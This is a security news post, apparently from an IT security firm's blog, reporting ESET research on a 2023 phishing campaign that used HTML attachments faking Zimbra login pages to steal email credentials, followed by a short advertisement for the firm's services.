Users of the Zimbra Collaboration email server have recently found themselves in the crosshairs of a carefully crafted social engineering campaign. This malicious campaign aims at the user's login credentials with a longer-term strategy of exploiting these in subsequent stages of the operation. Launched in April 2023, the campaign is currently active and appears to primarily focus on small to medium-sized businesses and government agencies. The bulk of the affected entities reportedly are in Poland, Ecuador, Mexico, Italy, and Russia. As of yet, cybersecurity experts have not pinpointed any specific threat actor or group behind this concerted campaign.
A typical pattern of the campaign, as outlined by Viktor Šperka, a researcher at ESET, involves the targeted individual receiving an email with an attached HTML file rigged as a phishing page. The email message often conveys a dire warning about an email server update, imminent account deactivation, or a related issue, trying to pressure the user into clicking the attached file.
These emails cunningly spoof the "from" address, making it appear as though they originate from a Zimbra administrator. This tactic is solely designed to enhance credibility and persuade the recipients to open the rigged attachment. The HTML file hides a Zimbra login page specifically customised to mimic the targeted organization. To make it appear more authentic, the username field comes filled in advance with the victim's email address.
Unsuspecting users, once they enter their credentials into the HTML form are unwittingly captured and sent via a HTTPS POST request to a server controlled by the attackers. However, what sets this campaign apart is its potential for self-propagation. Wave after wave of follow-up phishing attacks appears to have used accounts of legitimate businesses that have fallen victim to the initial wave. This suggests that the attacker used compromised administrator accounts from these victims to target other potential victims.
Šperka suggested, “One reason might be that the attacker is banking on password reuse by the administrator targeted through phishing.” This means the same credentials were used for both email and administration, making it easier for the attacker.
However, the complexity of the campaign is quite low in technical terms. It does, though, exploit the nuance that HTML attachments contain legitimate code. The only sign of something amiss is a link to the malevolent host embedded in the source code. Šperka further explained, "This makes it far simpler to bypass reputation-based anti-spam policies, in comparison with phishing techniques that place a malicious link directly in the body of the email."
At Darksteel Technologies, we are an Orlando based business that can handle all aspects of your IT security. Providing compliance, training, malware protection, cloud security, devsecops, vulnerability management, penetration testing, architecture design and any other information security requirement your business needs. We focus on your cybersecurity so you don't have to.